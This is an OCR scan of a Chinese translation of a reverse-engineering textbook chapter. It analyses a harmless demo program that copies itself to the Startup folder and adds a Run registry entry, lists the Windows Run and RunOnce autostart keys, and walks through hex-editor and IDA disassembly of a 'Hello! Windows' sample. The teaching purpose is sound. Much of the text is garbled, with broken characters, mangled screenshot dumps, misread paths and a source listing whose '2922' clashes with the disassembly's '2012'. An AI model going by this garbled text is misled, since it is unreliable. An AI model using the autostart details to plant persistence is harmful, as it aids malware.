MPP PRES o 


CJ AUE- 
a] 将 这 个 文件 夹 发 布 到 
e 


kJ HEX 





果然 和 日 志 所 描述 的 一 样 ， 创 建 了 一 个 0.exe 文件 。 

下 面 我 们 用 二 进 制 编辑 器 Stirling 对 比 一 下 0.exe fll sample mal.exe 
的 内 容 。 在 菜单 中 点 击 搜索 / 移动 一 比较 ， 在 弹出 的 窗口 中 选择 比较 对 
象 ， 点 击 OK 即 可 。 

通过 对 比 我 们 发 现 ， 两 个 文件 的 内 容 完 全 一 致 ， 也 就 是 说 ， 程 序 将 
自己 复制 了 一 份 。 


























二 进 制 代码 





TT 
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加 TI 





对 Dexe 


E D sample_malexe 


EAITN 
is program canno 
t be run in DOS 

00 00 00 00 00  mode....$ 
BÀ 54 AD 52 BA .2 马 3R]TaR]TaR] 
BA 55 AD 52 BA ;0 要 VaR];073UaR3 
30+ G3R3;D * YaRI 
JafaYaRaTaS3. aR] 
30, IVaR; TUS RI 


-nz3llBp3PichT.p3 M. 











[E& E880 Bytes — SHIFT-JIS /| 


由 于 “启动 ”文件 夹 中 的 程序 会 在 Windows 启动 时 自动 运行 ， 因 此 
当 我 们 重启 Windows 时 ，0.exe 就 会 被 运行 。 这 个 程序 并 不 会 带 来 什么 
实际 的 危害 ， 所 以 大 家 可 以 重启 系统 试 试 看 。 





1.1.2 ”从 注册 表 访 问 中 能 发 现 些 什么 

下 面 我 们 来 确认 一 下 注册 表 的 访问 情况 。 

Process Monitor 会 列 出 程序 访问 过 的 注册 表 项 目 和 文件 。 注 册 表 是 
Windows 系统 提供 给 应 用 程序 的 一 个 用 于 保存 配置 信息 的 数据 库 ， 其 中 
保存 的 数据 包括 浏览 器 设置 、 文 件 类 型 关联 、 用 户 密 码 等 。 

通过 查看 Process Monitor 输出 的 日 志 ， 我 们 可 以 知道 程序 向 “ 启 
动 ” iino MD) 

一 步 分 析 日 志 ， 我 们 还 可 以 发 现 程序 对 注册 表 进 行 了 一 些 可 疑 的 
































访问 。 





中 图 中 弹出 的 对 话 框 中 的 上 日文 “过 由 人 二 页 中 雪 萎 人 ”是 “没有 差异 ”的 意 
思 。 一 一 译 者 注 
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V Process Monitor 的 运行 结果 ( 注册 表 访 问 ) 


ZjProcess Monitor — Sysinternals: www. sysinternals. com 
File Edit Event Filter Tools Options Help 


SW | AGP | SAG! & | M5 | AAA zm 














Time of Day | Process Name PID Operation Path 


23:22:49. 286... []sample mal.exe 3008 BA SetEndDfFileInf... C:\Documents and Settings\XPMUser\My Documents. exe SUCCESS 
Cisample_mal.exe 3008 BACreateFileMapping C:\M\sample_mal. exe SUCCESS 

. C]sample mal.exe 3008 EÀ QueryStandardin... C:\M\sample_mal. exe SUCCESS 

.. [sample mal.exe 3008 BhCreateFileMapping C:\H\sample_mal. exe SUCCESS 
C]sample mal.eze 3008 ARriteFile C:\Documents and Settings\XPMUser\%y Documents. exe SUCCESS 

[sample mal.exe 3008 BA SetBasicInforma... C:\Documents and SettingsVXPMUserUG Documents\1. exe SUCCESS 

C]sample mal.exe 3008 EÀ CloseFile C: Vf sample mal. eze SUCCESS 

C sample, 3008 B CloseFile C:\Documents and Settings\XPMUser\My Documents\1. exe SUCCESS 


» ReeSetValue i Y lows \ Run samp] e_mal SUCCESS 


3008 Ej SetEndOfFileInf. .. C: \RINDOWS\system32\config\software. LOG SUCCESS 
口 sample_mal. eze 3008 BA SetEndOfFileInf... C:\RINDORS\system32\config\software. LOG SUCCESS 
.. [sample mal.exe 3008 BA SetEndDfFileInf... C: \RINDOWS\system32\config\software. LOG SUCCESS 
口 sample_mal. exe 3008 fi RegCloseKey HKLM\ SOFTRARE \Mi crosoft \Rindows\CurrentVersion\Run SUCCESS 
23:22:49. 288... C]sample_mal.exe 3008 Sh QueryOpen C:\M\sample_mal. eze SUCCESS |. 
< | > 


Showing 1,839 of 222,807 events (0.823) Backed by virtual memory 





看 来 程序 在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ 
Current Version\Run 中 创建 了 一 个 名 为 sample mal 的 注册 表 项 目 。 

HKEY LOCAL MACHINE SoftwareMicrosoft Windows Current 
Version Run 和 “启动 ”文件 夹 一 样 ， 其 中 注册 的 程序 会 在 Windows 重 
启 时 自动 运行 。 

Windows 重启 时 自动 运行 的 程序 可 以 注册 在 下 列 任 一 注册 表 的 


limi 








e HKEY LOCAL. MACHINE'SoftwareMicrosoftWWindowsV 
CurrentVersion\Run 

e HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
CurrentVersion\Run 

e HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ 
CurrentVersion\RunOnce 

e HKEY_CURRENT_USER\Software\Microsoft\Windows\ 


CurrentVersion\RunOnce 


此 外 ， 我 们 发 现 程序 还 在 C:\Documents and Settings\XPMUser\My 
Documents 目录 下 ， 也 就 是 “我 的 文档 ”文件 夹 下 创建 了 一 个 名 为 1.exe 
的 文件 。 














二 进 制 代码 





Tt 
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V 确认 “我 的 文档 ”文件 夹 的 内 容 


RH®) #88) EEV 收藏 入 TAG ew 


Qa- © i$ ss rer Gu 


Hit: @) (D) 我 的 文档 











文件 和 文件 夹 任务 7] I 


CD BEM 

8 将 这 个 文件 夹 发 布 到 
e 

kg 共享 此 文件 夹 





和 0.exe 一 样 ，1.exe 也 是 sample mal.exe 的 一 个 副本 。 

由 于 Lexe 的 路 径 已 经 被 注册 在 注册 表 HKEY LOCAL MACHINE 
Software\Microsoft\Windows\Current Version\Run 下 面 ， 因 此 当 Windows 
启动 时 就 会 自动 运行 1.exe。 

下 面 我 们 来 看 一 下 Windows 注册 表 的 内 容 。 使 用 Windows 自 带 

的 regedit 工具 就 可 以 查看 注册 表 ， 点 击 开始 菜单 一 运行 ， 输 入 regedit 
即 可 。 














V 确认 注册 表 内 容 


WFO 编辑 区 ) SEV KER W Ten OD 
由- 国 PropertySystem A|| 名称 
& Reinstall BITS GEREED 
ili fab]Gemplus Reader ... C:\Program Files\ICBCEbankTools\Gemplus\GenSafe Librar. 
[ab] gemstrmw C:\WINDOWS\system2\gemstrmw. exe /r 
[ab] ICECEBenkAssi st “C:\Program Files\ICBCEbankTools\ICBCSetupIntegration\... 
[ab] IMJEMIGS. 1 "C: WINDOWSNIMENimjpS 1NIMJPMIG. EXE" /Spoil /RemAdvDef... 
[ab]PKIMEZ002A C: WINDOWS Vsysten32VIMEVTINTLGNIXTINISETP. EXE /IMEName 
[ab] PHIMEZOOZASyne c: MEDIOTS Sys cuc TENTIRTLORT TTS RID EXE /STR 
RegTool RE : 





© RunÜnceEx 
oC) Setup 
C3 Sharednlls 
W- Shell Extensions 
四 shellCompatibility 
B- ShellSerap 
CJ ShellServiceübjectDel — || C] SSSRET RECO rr a TEE v: 
四国 Si deBySi de [ab] VBoxTr ay X C: WINDOWS syst en32 WBoxTr ay. exe 
(C3 SMbEn. 


m 6e 


可 以 发 现 注册 表 里 面 的 确 注册 了 C:\Documents and Settings 
XPMUser\My Documents\1.exe 这 样 的 内 容 。 
如 果 我 们 删除 0.exe 和 1.exe， 那 么 Windows 重启 时 就 不 会 再 
运行 sample_mal.exe 了 。 


其 实 ，sample_mal.exe 只 会 弹出 一 个 Hello Malware! 的 对 话 框 ， 并 
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没有 进行 其 他 任何 操作 。 因 此 ， 我们 只 要 将 “启动 ”文件 夹 、“ 我 的 文 
档 ” 以 及 注册 表 中 新 增 的 内 容 ( 文件 路 径 ) 删除 ， 系 统 环境 就 可 以 完全 
恢复 原状 了 。 








11.3 ”什么 是 逆向 工程 
通过 上 面 的 结果 我 们 可 以 发 现 ，sample_mal.exe 程序 会 执行 以 下 
操作 。 





e 修改 注册 表 以 便 在 系统 重启 时 自动 运行 
。 将 自己 复制 到 “启动 ”文件 夹 以 便 在 系统 重启 时 自动 运行 

















由 于 程序 没有 进行 网 络 通信 ， 因 此 我 们 暂时 不 需要 用 到 Wireshark。 

当然 ， 由 于 在 一 开始 我 们 不 知道 要 分 析 的 软件 具体 会 执行 怎样 的 操 
作 ， 因 此 应 该 尽 可 能 地 收集 完整 的 操作 日 志 ， 对 于 不 需要 的 部 分 只 要 放 
着 不 用 就 好 了 。 

像 上 面 这 样 对 软件 进行 分 析 并 搞 清楚 其 行为 的 工作 就 是 “逆向 工 
程 ”。 逆 向 工程 是 指 一 般 意义 上 的 软件 分 析 ， 其 对 象 不 仅 限于 恶意 软件 ， 
因此 也 不 一 定 和 计算 机 安全 有 关 。 

逆向 工程 原本 是 指 通过 拆 解 机 器 装置 并 观察 其 运行 情况 来 推导 其 制 
造 方法 、 工 作 原 理 和 原始 设计 的 行为 ， 但 在 软件 领域 ， 逆 向 工程 主要 指 
的 是 阅读 反 汇 编 (将 机 器 语言 代码 转换 成 汇编 语言 代码 ) 后 的 代码 ， 以 
及 使 用 调试 器 分 析 软 件 行为 等 工作 。 

一 直 以 来 ， 在 计算 机 病毒 分 析 、 防 止 软件 非法 使 用 的 防 拷 贝 技术 ， 
以 及 评估 软件 强度 的 抗 自 改 测试 等 领域 都 会 用 到 逆向 工程 技术 。 一 般 认 
为 ， 和 软件 开发 所 使 用 的 编程 技术 相 比 ， 逆 向 工程 属于 另 一 种 完全 不 同 
的 技能 。 此 外 ， 由 于 逆向 工程 常常 被 用 于 恶意 软件 分 析 、 防 找 贝 等 领 
域 ， 因 此 也 经 常 被 归 为 安全 技术 的 一 种 。 
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一 专栏 : 逆向 工程 技术 大 赛 

















向 工程 学 习 如 何 读 懂 二 进 制 代码 











在 一 些 国 Rs 























政府 和 民间 社区 会 举办 














Flag) AR A AIH | 





1: | CTF ( Capture the 























句 工程 技术 大 赛 ， 以 推动 信息 安 








e SECCON CTF ( 日 本 ) 


http://www.seccon.jp/ 


e DEFCON CTF ( 美国 ) 
http://www.defcon.org/html/defcon-20/dc-20-ctf.html 


e CODEGATE CTF ( 韩国 ) 
http://yut.codegate.org/ 





近年 来 ， 随 









































技术 的 发 展 。 





世界 各 地 都 


























10 ~ 20 个 队伍 进入 决赛 。 





尽管 很 多 比赛 











全 竞赛 活动 。 这 些 竞赛 基本 上 都 是 通过 线 上 预赛 











F REF 














的 水 平 很 高 ， 但 比赛 本 身 也 十 分 














话 去 参加 一 下 也 








尝 不 可 。 








展 各 种 安 


选 出 成 绩 最 好 的 





趣 ， 








兴趣 的 
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12 ”尝试 静态 分 析 


1.2.1 静态 分 析 与 动态 分 析 
软件 分 析 从 方法 上 可 大 体 分 为 “静态 分 析 ” 和 “动态 分 析 ” 两 种 。 
简单 来 说 ， 它 们 的 区 别 如 下 。 





。 静态 分 析 : 在 不 运行 目标 程序 的 情况 下 进行 分 析 
。 动态 分 析 : 在 运行 目标 程序 的 同时 进行 分 析 





刚才 我 们 对 sample_mal.exe 进行 分 析 的 方法 就 属于 动态 分 析 。 相 对 
地 ， 静 态 分 析 主 要 包括 以 下 方法 。 


。 阅读 反 汇编 代码 
。 提取 可 执行 文件 中 的 字符 串 ， 分 析 使 用 了 哪些 单词 











从 广义 上 来 看 ， 用 二 进 制 编辑 器 查看 可 执行 文件 的 内 容 也 可 以 算 作 
是 一 种 静态 分 析 。 

下 面 ， 我 们 先 来 对 chapüIwsampleOlaWRelease 中 的 示例 程序 
wsample01a.exe 进行 静态 分 析 。wsample01a.exe 的 运行 结果 如 下 所 示 。 






































Y wsample01a.exe 的 运行 结果 


MESSAGE (X) 


Hello! Windows 





运行 之 后 ， 我 们 发 现 这 个 程序 只 是 简单 地 显示 了 一 个 Hello! Windows 
对 话 框 而 已 。 
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可 是 ， 这 个 程序 真 的 就 这 么 简单 吗 ? 让 我 们 再 仔细 研究 一 下 。 
首先 ， 我 们 用 二 进 制 编辑 器 打开 wsample01a.exe 文件 。 文 本 编辑 器 
还 是 有 很 多 人 经 常 使 用 的 ， 不 过 会 使 用 二 进 制 编辑 器 的 人 可 就 不 多 了 。 
在 软件 分 析 中 ， 二 进 制 编辑 器 可 是 要 从 头 用 到 尾 的 。 就 我 个 人 来 说 ， 二 
进 制 编辑 咒 、 计 算 器 、 反 汇编 右 和 调试 器 可 谓 是 逆向 工程 的 四 大 法 宝 ， 
不 过 在 这 方面 使 用 什么 工具 也 是 因 人 而 异 ， 我 说 的 也 并 不 是 唯一 标准 。 
在 二 进 制 编辑 融 中 ， 比 较 流行 的 主要 是 以 下 两 种 。 























































































































e Stirling 
http://www.vector.co.jp/soft/win95/util/se079072.html 


* BZ Editor 
http://www.vector.co.jp/soft/win95/util/se032859.html 


这 两 个 工具 可 以 说 各 有 所 长 ， 大 多 数 软 件 分 析 者 都 是 两 者 并 用 的 。 
笔者 也 是 两 个 工具 都 安装 了 ,但 如 果 一 定 要 二 者 选 其 一 的 话 ， 笔 者 比较 
推荐 Stirling， 本 书 中 的 讲解 也 是 以 使 用 Stirling 为 前 提 来 进行 的 ( 理由 
请 参见 专栏 )。 














-一 专栏 : Stirling 5 BZ Editor 的 区 别 
刚才 我 们 提 到 “Stirling 和 BZ Editor 这 两 个 工具 各 有 所 长 "， 但 
使 用 Stirling 基本 上 可 以 应 付 大 多 数 情况 。 
Am, RE Stirling 功能 强大 ， 可 以 应 付 各 种 情况 ， 但 处 理 尺 二 
较 大 的 文件 会 消耗 过 多 的 内 存 ， 因 此 无 法 处 理 几 个 GB 大 小 的 文件 。 
一 般 来 说 ， 我 们 处 理 大 文件 的 机 会 还 是 比较 少 的 ， 因 此 通常 情 
况 下 使 用 Stirling 就 足够 了 ， 不 过 BZ Editor 却 Douce 
它 可 以 轻松 打开 大 文件 ， 而 且 反 应 更 敏捷 。 
尽管 现实 总 是 不 完美 ， 但 其 实 我 真心 希望 这 两 个 工具 能 够 被 整 
合 起 来 ， 变 成 一 个 既 拥有 强大 功能 ， 又 能 够 轻松 处 理 大 文件 的 二 
制 编辑 器 。 若 真能 如 此 ， 夫 复 何 求 ? 
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1.2.2 用 二 进 制 编辑 器 查看 文件 内 容 
下 面 我 们 用 Stirling 打开 wsample01a.exe 看 一 看 。 

















v 用 Stirling 打开 wsample01a.exe 的 样子 


So Stirling - [wsample01a.exe] 

i 224 EE BEB HEO HW WH 

ojele] ole elele à 

ADI 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D OE OF 

WE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 O0 00 
00 00 00 00 20 74 15 4F 00 00 00 00 02 00 00 00 
85 00 00 00 A0 21 00 00 AO OF 00 00 38 30 40 00 
90 30 40 00 32 00 30 00 31 00 32 00 00 00 00 00 
4D 00 45 00 53 00 53 00 41 00 47 00 45 00 00 00 
48 00 65 00 6C 00 6C 00 6F 00 21 00 20 00 32 00 
30 00 31 00 32 00 00 00 49 00 65 00 6C 00 6C 00 
6F 00 21 00 20 00 57 00 69 00 6E 00 64 00 6F 00 
77 00 73 00 00 00 00 00 48 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 30 40 00 30 22 40 00 01 00 00 00 
I) 52 53 44 53 CE 07 FF 1C 57 Ab 3E 43 9D B6 D3 8B 
FO 9D C3 F8 01 00 00 00 43 3A 5C 44 6F 63 75 6D 
(80000000 | — | 























用 Stirling 打开 wsampleOla.exe 后 ， 我 们 可 以 看 到 屏幕 上 显示 出 一 
串 十 六 进 制 字符 。 这 就 是 Windows 可 执行 文件 格式 ， 即 “PE 格式 ”的 
文件 内 容 。 关 于 PE 格式 的 详细 信息 ， 可 以 通过 阅读 官方 文档 来 搞 明白 ， 
不 过 这 一 次 我 们 还 不 用 了 解 得 那么 深入 ， 只 要 看 个 大 概 就 行 了 ， 不 需 
理解 这 些 数据 的 含义 。 

乍 一 看 ， 我 们 就 能 够 发 现下 面 这 些 内 容 。 

















。 字符 串 MESSAGE 和 Hello! Windows 

© 文件 路 径 C:\Documents and SettingsX PMUsenMy Documents 
Visual Studio 2010\Projects\wsample01a\Release\wsample01a.pdb 

。 字符 串 KERNEL32.dll、MessageBoxW 


除 此 之 外 还 有 其 他 一 些 字符 串 貌 似 也 能 看 出 什么 意思 ， 不 过 好 像 叉 
看 不 太 明 白 ， 总 之 现在 到 这 一 步 就 可 以 了 。 
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1.2.8 ”看 不 懂 汇编 语言 也 可 以 进行 分 析 

接 下 来 我 们 试 试看 对 wsample01a.exe 进行 反 汇编 。 

本 书 中 我 们 使 用 IDA 5.0 Freeware 版 (免费 版 ) 作为 反 汇 编 工具 。 
和 正式 版 相 比 ， 免 费 版 支持 的 处 理 器 数量 较 少 ， 而 且 还 有 一 些 功能 限 
制 ， 但 它 的 性 能 依然 出 众 ， 在 反 汇 编 领域 可 以 说 无 出 其 右 。 工 具 的 安装 
方法 请 参见 附录 。 

大 家 也 可 以 下 载 最 新 的 6.2 Demo 版 ， 不 过 这 个 版 本 有 使 用 时 间 
限制 。 
























































e IDA 6.2 Demo version, IDA 5.0 Freeware version 


http://www.hex-rays.com/products/ida/support/download.shtml 














也 许 大 家 印象 里 觉得 汇编 语言 非常 难 届 ,但 其 实现 在 我 们 有 很 多 功 
能 强大 的 工具 ， 可 以 像 看 流程 图 一 样 对 软件 进行 分 析 。 下 面 让 我 们 来 体 
验 一 下 。 

首先 ， 将 wsampleOla.exe Hi 2$] IDA 的 图 标 上 ， 然 后 会 显示 一 个 
About 对 话 框 ， 我 们 按 OK 将 它 关 闭 。 

接 下 来 ， 会 弹出 一 个 Load a new file 对 话 框 ,询问 用 什么 格式 打开 
指定 的 文件 。 

这 里 我 们 选择 Portable executable for 80386 (PE)， 然 后 按 OK. 

随后 可 能 还 会 弹出 一 些 消息 ， 只 要 点 击 OK 就 可 以 了 。 

接着 ，IDA 会 弹出 一 个 分 析 窗 口 。 

右边 有 一 个 名 叫 Names window 的 窗口 ， 它 默认 是 打开 的 ， 如 果 没 
有 打开 的 话 可 以 按 Shift+F4 打开 ， 或 者 也 可 以 点 击 菜单 View > Open 
subviews 一 Names。 

JE Names window 窗口 的 最 上 方 会 显示 wWinMain 这 个 函数 名 ， 双 
击 它 。 

接 下 来 ，IDA View-A 窗口 中 会 显示 出 反 汇 编 代 码 。 
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v H IDA 打开 wsample01a.exe ( Load a new file ) 


Load a new file 


Load file C:\Documents and ar nan ly Documents\Visual Studio} 





MS-DOS executable (EXE) mm ldw] 
Binary file 








Processor type 
Intel 80x86 processors: metapc 

















— - Analysis — — — 
Loading segment 0x000 0 |] Enabled 























Loading offset 0x0 D |v] Indicator enabled 











‘Options 
V] Create segments Kemel options 
Load resources. 
Rename DLL entries 
Manual load [ooo 
Fill seament gaps 
Make imports segment Processor options 
Create FLAT group. PREIS 



























































System DLL directory | CNWINDOWwS 


Cancel Help 














Y 用 IDA 打开 wsampleO1a.exe ( 分 析 窗 口 ) 


(TDA ~ C:¥Documents and Settings¥XPMUser¥My Documents¥ Visual Studio 2010¥Projects¥msample 0 1a¥ Release¥msam 
File Edit Jump Search View Debugger Options Windows Help 




















































[oo tal] -- [|a e [8 | [ie vj [-* x|aem|e 
|B&Be[[BB vaa 7a] [58$ N x 
ECEE R oe S MK zl: x || urs] 








[eee ees saa) 
TE) D NN | 


[Bi DAvewa| E] Hex ViewA| 5B Exports [EE Impos] N Nemes | Funcions| Suings| B, Stuctues| En Eras] 















































B IDA View-A 


F security check. cookie. 0040104D 
F pre epp init 0040105C 
F iman RT Staun mnaninaz. 
F pe c int 00401278 
L wwinMainCRTStartup 00401332 


; Attributes: library function 


[publ ic wlirkainCRTStartup 
inMainPRTStartup proc near 

—security init. cookie| Length. T Sting 

一 tmainCRTStartup mms 
inainERTStartup endo ids D Lor 
moo C — KERMELS2dE 
(OC C MessaosBoay 
moomo C Baihcivewinda 
00000008 C USER32 


C854-75) | (04759) | 00000732 | 00401332: wWinMainCRTStartup 








[Compiling file ‘c:\program Files\IDA Free\idc\ida. idc" a 
[Executing function "main B 
[compitino file 'Crwerogram FilesVIDA FreeXidcvonload. idc* 

|Executing function "OnLoad* 

[Toa is analysing the input file. 

[You may start to explore the input file right now. 

Propagating type information. « 

| 401576: p 








m 





也 可 以 右键 点 击 函 数 名 ， 从 菜单 中 选择 Text view 或 者 是 Graph 





view， 用 不 同 的 视图 来 查看 代码 ， 默 认 视 图 为 Graph view. 








16 | 
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Y wWinMain 函数 的 反 汇 编 代 码 ( Graph view ) 


Ei IDA View-A 


回回 四 
; int _stdcall winMain(Cint ,int ,LPCWSTR IpStringl, int) 
wllinMain proc near 


IpStringl= dword ptr 10h 


ebp 
ebp, esp 
eax, Lebpt|pStringl] 
offset String2 ; 72012" 
pStringl 
8 ; 1st rcmpWCx,x) 


offset Caption ; "MESSAG 
eax, e 


ax 
short loc 401035 








Y 





EN 











loc_401035: ; “Hello! Windows” 
push offset aHelloWindows 

Jp call G 
push 

call 

xor 


pop 
retn 





100.00% 23807) 181) 00000400 ^ 00401000: wiWinMain 


在 这 个 视图 中 ，IDA 会 显示 出 调用 的 函数 以 及 传递 的 参数 ， 十 分 容 


易 理解 


o 

















也 许 你 兽 经 认为 “汇编 语言 很 难 懂 "， 但 我 们 现在 有 了 很 多 工具 ， 
甚至 在 软件 分 析 中 已 经 几乎 用 不 到 汇编 语言 的 知识 了 ， 大 家 看 看 IDA 显 
示 出 来 的 汇编 语言 代码 应 该 就 能 够 明白 了 。 




















1.2.4 ”在 没有 源 代码 的 情况 下 搞 清楚 程序 的 行为 


下 








我 们 来 看 看 wWinMain 函数 里 面 的 逻辑 ， 除 了 Hello! Windows, 











MESSAGE, MessageBoxW 等 字符 串 以 外 ， 我 们 还 能 发 现下 列 字符 串 。 


e 2012 
e |strempW 
e GetActiveWindow 


LN 








pm 





H 





P 尤 其 值得 寻味 是 Hello! Windows 和 Hello! 2012 这 两 个 字符 串 ， 


它们 是 在 不 同 的 条 件 分 支 中 显示 的 。 
我 们 尝试 在 命令 行 中 用 2012 作为 参数 来 运行 一 下 wsample01a.exe。 
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v 运行 示例 
C:\>wsample01la.exe 2012 


Y 向 wsample01a.exe 传递 参数 2012 后 的 运行 结果 


MESSAGE (X) 


Hello! 2012 











和 无 参数 的 情况 相 比 ， 这 次 显示 出 来 的 消息 变 成 了 Hello! 2012。 
可 能 有 人 要 问 :" 那 又 如 何 ?” 我 们 发 现 了 通过 传递 2012 这 个 参数 ， 
程序 的 显示 结果 会 发 生变 化 ， 这 很 重要 。 因 为 我 们 在 “完全 没有 源 代码 
的 情况 下 ， 搞 清楚 了 程序 的 行为 ”。 
这 就 是 逆向 工程 。 
刚才 这 个 参数 是 我 们 猜测 出 来 的 ， 其 实 只 要 阅读 汇编 语言 代码 ， 就 
可 以 发 现 其 中 使 用 了 IstrempW 对 字符 串 2012 和 命令 行 参 数 进 行 了 比较 
































出 

















Y wsample01a.exe 


00401000 ; int | stdcall wWinMain(int,int,LPCWSTR lpStringl,int) 
00401000 wWinMain proc near 


00401000 

00401000 lpStringl = dword ptr 10h 

00401000 

00401000 push ebp 

00401001 mov ebp, esp 

00401003 mov eax, [ebp+lpString1] 
00401006 push offset String2 ; "2012" 
0040100B push eax ; lpStringl 
0040100C call ds: imp  lstrcmpW8G8 ; lstrcmpW(x,x) 
00401012 push 0 ; uType 
00401014 push offset Caption ; "MESSAGE" 
00401019 test eax, eax 

0040101B jnz short loc 401035 


0040101D push offset Text g "Hello! 2012" 




















二 进 制 代码 











jus 
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00401022 call ds: imp  GetActiveWindow90 ; 
GetActiveWindow () 

00401028 push eax ; hWnd 
00401029 call ds:__imp__MessageBoxW@16 ; 
MessageBoxW (x,x,x,x) 


0040102F xor eax, eax 
00401031 pop ebp 
00401032 retn 10h ; lpCaption 


00401035 loc 401035: 

00401035 push offset aHelloWindows ; "Hello! Windows" 
0040103A call ds: imp  GetActiveWindow90 ; 
GetActiveWindow() 

00401040 push eax ; hWnd 
00401041 call ds: imp  MessageBoxWOl6 ; 
MessageBoxW (x, x,x,x) 

00401047 xor eax, eax 

00401049 pop ebp 

0040104A retn 10h 

0040104A wWinMain  endp 








当然 ,我 们 没 必 要 看 懂 全 部 的 汇编 语言 代码 。 和 刚才 使 用 二 进 制 
编辑 器 的 时 候 一 样 ， 只 要 一 眼 望 去 能 大 概 理解 这 段 代 码 做 了 什么 事 就 
可 以 了 。 











pum 





1.2.5 “确认 程序 的 源 代码 


最 后 让 我 们 来 看 一 下 wsample0la.exe 真正 的 源 代 码 (chap01\ 
wsample01a 中 的 wsample01.cpp )。 要 编译 这 段 代码 需要 安装 Visual 
Studio。 关 于 Visual Studio 的 安装 方法 请 参见 附录 ， 关 于 如 何 编译 请 参 
见 readme 文件 。 





Y wsample01a.cpp 


#include <Windows.h> 
#include <tchar.h> 


int APIENTRY tWinMain( 
HINSTANCE hInstance, 


HINSTANCE hPrevInstance, 
LPTSTR lpCmdLine, 
int nCmdShow) 


if (lstrcemp (lpCmdLine, 
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—T("2922") == 0) { 
MessageBox (GetActiveWindow(), 


 T("Hello! 2012"), _T("MESSAGE"), MB OK); 
}else{ 
MessageBox (GetActiveWindow(), 
_T("Hello! Windows"),  T("MESSAGE"), MB OK); 


} 


return 0; 





现在 大 家 能 够 理解 IDA. 的 反 汇编 结果 是 何等 容易 理解 了 吧 





刚 一 听 到 “逆向 工程 ” 





Lio 


“汇编 ”这 些 词 的 时 候 ， 大 家 总 会 以 为 它们 





























很 难 ， 但 实际 上 并 非 如 此 。 使 





] IDA， 我 们 就 可 以 将 可 执行 文件 转换 成 





像 C 语言 一 样 容易 理解 (实际 上 还 是 有 差距 的 ) 的 汇编 代码 。 尤 其 是 它 
的 Graph view 十 分 强大 ， 可 以 让 我 们 十 分 清晰 地 看 出 程序 的 分 支 逻 辑 。 









































只 要 一 定 程度 上 掌握 这 些 工 具 的 使 
件 分 析 工 作 了 。 








] 方 法， 大 家 就 可 以 完成 很 多 软 
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13 ”尝试 动态 分 析 


1.3.1 设置 Process Monitor 的 过 滤 规 则 

接 下 来 ， 我 们 来 尝试 一 下 动态 分 析 。 

相对 于 静态 分 析 而 言 ， 动 态 分 析 是 在 日 标 程序 运行 的 同时 跟踪 其 行 
为 的 方法 。 在 这 里 ， 我 们 主要 用 调试 需 来 跟踪 程序 逻辑 ， 除 此 以 外 ,下 
面 这 些 方法 也 被 称 为 动态 分 析 。 















































。 获 取 文 件 和 注册 表 访 问 日 志 
。 抓 取 网 络 包 


下 面 我 们 来 分 析 一 下 chap0l\wsample01b\Release 中 的 示例 程序 
wsample01b.exe. 


我 们 先 来 看 一 下 wsample01b.exe 的 运行 结果 。 


Y wsample01b.exe 的 运行 结果 


MESSAGE (X) 


Copied! 





这 个 程序 看 起 来 只 是 在 屏幕 上 显示 了 一 条 Copied! 消息 ， 实 际 上 背 
后 发 生 了 什么 呢 ? 我 们 还 不 得 而 知 。 下 面 我 们 来 仔细 研究 一 下 。 

我 们 可 以 用 Process Monitor 来 输出 示例 程序 wsample01b.exe 的 运行 
日 志 。 

启动 Procmon.exe 之 后 ， 会 弹出 过 滤 规 则 设置 窗口 ， 我 们 在 这 里 设 
置 为 wsample01b.exe。 

如 果 没 有 弹出 过 滤 规 则 设置 窗口 ， 可 以 按 下 Ctrl+L 或 者 点 击 菜单 中 
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的 Filter 一 Filter...。 


V 在 Process Monitor 的 过 滤 规 则 中 设置 wsample01b.exe 


W Process Monitor Filter 


Display entries matching these conditions: 




















Process Name Mis M ||wsampleO1b.exe Include | 








Reset 


Column Relation | Value Action 
v] Process Name is wsampleO1bexe Include 





























在 过 滤 规 则 里 面 可 以 进行 各 种 设置 。 
这 里 我 们 希望 实现 的 是 “ 当 进 程 名 称 为 wsample01b.exe 时 输出 日 
志 ”， 设 置 好 之 后 显示 的 文字 描述 如 下 。 











Process Name is wsample01b.exe then Include 


输入 规则 后 ， 按 下 Add 按钮 ， 这 条 规则 就 会 被 添加 到 下 面 的 列表 中 。 
设置 完成 ， 点 击 OK 关闭 设置 窗口 ， 然 后 运行 wsample01b.exe。 


V 运行 wsample01b.exe 并 输出 日 志 


已 Process Monitor — Sysinternals: www.sysinternals.com 
File Edit Event Filter To Options Help 
md ae) vA@! El A)| AAA 


of Day Process Name PID Operation Result Detail 
632... [)wsampledib. 4084 Gj Process Start SUCCESS Parent PID: 7.. 
632... []]wsampletib. 4084 Ej Thread Create SUCCESS Thread ID: 2032 
. 634. wsample0ib. 4084 EÑ QuerrHameInform... C: \M\wsample01b. eze SUCCESS Name: ‘MN\wsam. 
. 534. wsample01b 4084 Ej Load Image C: Uf sampleüib. exe SUCCESS Image Base: 0... 
634. wsampleüib. 4084 Ej Load Image C:NRINDOWSAsystem32Wntdll, dll SUCCESS Image Base: 0... 
c 
c 











. 534. wsampleüib 4084 Ej QuerrHameInform... C: \M\wsample01b. exe SUCCESS Name: \W\wsam. .. 
34, wsample01b. 4084 PACreateFile : \RINDORS\Prefetch\WSAMPLEO1B. EXE-26... NAME NOT FOUND Desired Acces. . 
634. wsample01b 4084 Bi RezOpenker HKLM\Software\Microsoft\Rindows NTACu... NAME NOT FOUND Desired Acces... 
. 634. wsampleüib. 4084 BACreateFile CA SUCCESS Desired Acces... 
. 536. weample01b 4084 Gj Load Image C: \RINDOWS\ syst em32\kernel 32. dll SUCCESS Image Base: 0. 
637. wsample01b 4084 f RezOpenker rentControlSetiControl... SUCCESS Desired Acces. 
637. wsampleüib. 4084 Bi ReeQueryValue Kad rentCont rol Set \Control... SUCCESS Type: REG_DWO... 
637. wsample01b 4084 Ø ReeCloseker rentControlSetVControl... SUCCESS 
. 640. wsampleüib 4084 Ej Load Image Copied! em32\user32. dll SUCCESS Image Base: 0 
640. wsample01b 4084 Gj Load Image em32Xgdi 32. d11 SUCCESS Image Base: 0 
. 640. wsampleü1b. 4084 Ej Load Image em32\shel132, dll SUCCESS Image Base: 0. 
